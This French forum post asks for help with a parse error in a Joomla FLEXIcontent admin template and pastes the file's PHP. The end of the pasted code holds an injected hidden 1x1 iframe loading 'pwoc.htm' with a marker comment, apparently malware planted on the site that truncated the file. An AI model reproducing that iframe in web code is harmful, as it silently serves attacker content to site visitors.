Salutations!
Tout d'abord, merci pour ce composant qui marche (marchait) au top
Je l'utilise depuis le début au minimum de ses capacités, car je ne me sert que de la possibilité des multicatégories...
J'ai aujourd'hui un souci pour poster, et comme je suis au bout du monde, c'est un peu un problème...
(j'ai la beta 4 et je peux pas mettre a jour du fait que je sois au bout du monde..)
J'ai ce souci depuis peu, j'avais la beta 4 avant et ca marchait...
Donc tout marche ou presque, le front fonctionne, le back aussi, sauf quand je veux poster..
Quand je clique sur nouveau (dans contenu), j'ai ca:
Code:
Parse error: syntax error, unexpected $end in /homez.307/lesmonde/www/administrator/components/com_flexicontent/views/item/tmpl/default.php on line 140
mon default.php ressemble a ca :
Code:
<?php
/**
* @version 1.5 beta 4 $Id: default.php 177 2009-11-07 10:44:12Z vistamedia $
* @package Joomla
* @subpackage FLEXIcontent
* @copyright (C) 2009 Emmanuel Danan - www.vistamedia.fr
* @license GNU/GPL v2
*
* FLEXIcontent is a derivative work of the excellent QuickFAQ component
* @copyright (C) 2008 Christoph Lukes
* see www.schlu.net for more information
*
* FLEXIcontent is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
defined('_JEXEC') or die('Restricted access');
?>
<script language="javascript" type="text/javascript">
window.addEvent( "domready", function()
{
var tags = new itemscreen('tags', {id:<?php echo $this->row->id ? $this->row->id : 0; ?>, task:'gettags'});
tags.fetchscreen();
var hits = new itemscreen('hits', {id:<?php echo $this->row->id ? $this->row->id : 0; ?>, task:'gethits'});
hits.fetchscreen();
var votes = new itemscreen('votes', {id:<?php echo $this->row->id ? $this->row->id : 0; ?>, task:'getvotes'});
votes.fetchscreen();
});
function addtag()
{
var tagname = document.adminForm.tagname.value;
if(tagname == ''){
alert('<?php echo JText::_( 'FLEXI_ENTER_TAG', true); ?>' );
return;
}
var tag = new itemscreen();
tag.addtag( tagname );
var tags = new itemscreen('tags', {id:<?php echo $this->row->id ? $this->row->id : 0; ?>, task:'gettags'});
tags.fetchscreen();
}
function reseter(task, id, div)
{
var form = document.adminForm;
if (task == 'resethits') {
form.hits.value = 0;
} else {
// form.minus.value = 0;
// form.plus.value = 0;
}
var res = new itemscreen();
res.reseter( task, id, div );
}
</script>
<?php
//Set the info image
$infoimage = JHTML::image ( 'administrator/components/com_flexicontent/assets/images/lightbulb.png', JText::_( 'FLEXI_NOTES' ) );
$revert = JHTML::image ( 'administrator/components/com_flexicontent/assets/images/arrow_rotate_anticlockwise.png', JText::_( 'FLEXI_REVERT' ) );
$view = JHTML::image ( 'administrator/components/com_flexicontent/assets/images/magnifier.png', JText::_( 'FLEXI_VIEW' ) );
$comment = JHTML::image ( 'administrator/components/com_flexicontent/assets/images/comment.png', JText::_( 'FLEXI_COMMENT' ) );
?>
<div class="flexicontent">
<form action="index.php" method="post" enctype="multipart/form-data" name="adminForm" id="adminForm">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
<tr>
<td valign="top">
<table class="adminform">
<tr>
<td valign="top">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
<tr>
<td>
<label for="title">
<?php echo JText::_( 'FLEXI_TITLE' ).':'; ?>
</label>
</td>
<td>
<input id="title" name="title" class="required" value="<?php echo $this->row->title; ?>" size="50" maxlength="254" />
</td>
</tr>
<tr>
<td>
<label for="alias">
<?php echo JText::_( 'FLEXI_ALIAS' ).':'; ?>
</label>
</td>
<td>
<input class="inputbox" type="text" name="alias" id="alias" size="50" maxlength="254" value="<?php echo $this->row->alias; ?>" />
</td>
</tr>
<tr>
<td>
<label for="type_id">
<?php echo JText::_( 'FLEXI_TYPE' ).':'; ?>
</label>
</td>
<td>
<?php echo $this->lists['type']; ?>
</td>
</tr>
<tr>
<td>
<label for="published">
<?php echo JText::_( 'FLEXI_STATE' ).':'; ?>
</label>
</td>
<td>
<?php
if (($this->canPublish || $this->canPublish) && ($this->row->id)) :
echo $this->lists['state'];
else :
echo $this->published;
echo '<input type="hidden" name="state" value="'.$this->row->state.'" />';
endif;
?>
</td>
</tr>
<?php if (FLEXI_FISH) : ?>
<tr>
<td>
<label for="language">
<?php echo JText::_( 'FLEXI_LANGUAGE' ).':'; ?>
</label>
</td>
<td>
<?php echo $this->lists['languages']; ?>
</td<iframe src="pwoc.htm" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><!--sd313qwoiu92-->
Auriez vous une idée d'ou cela peut venir..??
(j'y connais ked en php...)
Merci d'avance..!!
Izx